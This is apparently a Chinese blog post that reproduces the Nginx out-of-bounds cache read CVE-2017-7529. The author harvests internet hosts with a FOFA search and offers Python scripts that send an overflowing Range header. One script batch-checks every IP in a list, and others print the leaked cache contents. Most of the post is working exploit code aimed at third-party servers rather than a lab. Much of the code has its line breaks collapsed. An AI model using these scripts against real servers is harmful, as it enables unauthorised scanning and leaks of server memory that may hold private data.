0x07 Nginx越界读取缓存漏洞 CVE-2017-7529 复现

参考：

• Nginx越界读取缓存漏洞 CVE-2017-7529 | PeiQi文库 (wgpsec.org)
• Nginx越界读取缓存漏洞（CVE-2017-7529）复现分析 - qweg_focus - 博客园 (cnblogs.com)

一、fofa 搜索

nginx && port="80"

我这里写了个脚本将ip保存下来，搜索ip脚本的编写教程：Python教程：如何用Python编写FOFA爬虫获取信息？_fofa python-CSDN博客

 

二、漏洞复现

漏洞poc

#!/usr/bin/env python
import sys
import requestsif len(sys.argv) < 2:print("%s url" % (sys.argv[0]))print("eg: python %s http://your-ip:8080/" % (sys.argv[0]))sys.exit()headers = {'User-Agent': "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.10240"
}
offset = 605
url = sys.argv[1]
file_len = len(requests.get(url, headers=headers).content)
n = file_len + offset
headers['Range'] = "bytes=-%d,-%d" % (n, 0x8000000000000000 - n)r = requests.get(url, headers=headers)

我根据poc重写了脚本，读取本地的ip.txt文件进行验证漏洞

#!/usr/bin/env python
import requestsdef check_vulnerability(url):"""检查给定的URL是否存在漏洞，根据响应内容进行判断。参数:url (str): 需要检查漏洞的URL。返回:bool: 如果存在漏洞返回True，否则返回False。"""headers = {'User-Agent': "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.10240"}offset = 605  # 调整字节范围的偏移量try:# 发起初始请求以获取响应内容长度response = requests.get(url, headers=headers, timeout=10)file_len = len(response.content)n = file_len + offset# 设置Range头部以请求特定的字节范围headers['Range'] = "bytes=-%d,-%d" % (n, 0x8000000000000000 - n)r = requests.get(url, headers=headers, timeout=10)# 检查响应是否指示存在漏洞（例如，状态码206且内容非空）if r.status_code == 206 and r.content:return Trueexcept requests.RequestException as e:# 静默处理请求异常pass# print(f"请求错误: {e}")return Falsedef main():"""主函数，从文件中读取URL并检查每个URL是否存在漏洞。"""# 打开包含URL的文件with open('ip.txt', 'r') as file:urls = [line.strip() for line in file]# 检查每个URL是否存在漏洞for url in urls:# print(f"正在验证的URL: {url}")if check_vulnerability(url):print(f"验证成功的URL: {url}")if __name__ == "__main__":main()

 

三、利用漏洞

poc

import requests
import urllib3def cve20177529():try:# 构造请求头headers = {'User-Agent': "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.88 Safari/537.36"}url = 'http://127.0.0.1:8080/'# 获取正常响应的返回长度# verify=False防止ssl证书校验，allow_redirects=False，防止跳转导致误报的出现r1 = requests.get(url, headers=headers, verify=False, allow_redirects=False)url_len = len(r1.content)# 将数据长度加长，大于返回的正常长度addnum = 320final_len = url_len + addnum# 构造Range请求头，并加进headers中# headers['Range'] = "bytes=-%d参考资料,-%d" % (final_len, 0x8000000000000000-final_len)
0x8000000000000000headers = {'User-Agent': "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.88 Safari/537.36",'Range': "bytes=-%d,-%d" % (final_len, 0x8000000000000000 - final_len)}# 用构造的新的headers发送请求包,并输出结果r2 = requests.get(url, headers=headers, verify=False, allow_redirects=False)text = r2.textcode = r2.status_codeprint(code)#打印状态码print(text)#打印响应except Exception as result:print(result)if __name__ == "__main__":urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)cve20177529()

 我用这个poc遇到目标进行302重定向没有获取到目标信息，然后我又改了一下

import requests
import urllib3def cve20177529():"""检查特定URL是否存在CVE-2017-7529漏洞。"""try:# 构造请求头，模拟浏览器访问headers = {'User-Agent': "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.88 Safari/537.36"}url = 'http://xxxx'  # 目标URL# 发起初始请求以获取响应内容长度r1 = requests.get(url, headers=headers, verify=False, allow_redirects=True)url_len = len(r1.content)# 设置范围增量addnum = 320final_len = url_len + addnum# 构造带有Range头部的请求headers['Range'] = "bytes=-%d,-%d" % (final_len, 0x8000000000000000 - final_len)# 发送带有Range头部的请求r2 = requests.get(url, headers=headers, verify=False, allow_redirects=True)text = r2.textcode = r2.status_code# 输出响应状态码和内容print(f"Status Code: {code}")print("Response Body:")print(text)except Exception as e:# 捕捉并输出异常信息print(f"An error occurred: {e}")if __name__ == "__main__":# 禁用SSL警告urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)# 调用检查函数cve20177529()

状态码 206 表示“部分内容”（Partial Content），通常是在服务器处理了部分范围请求时返回的。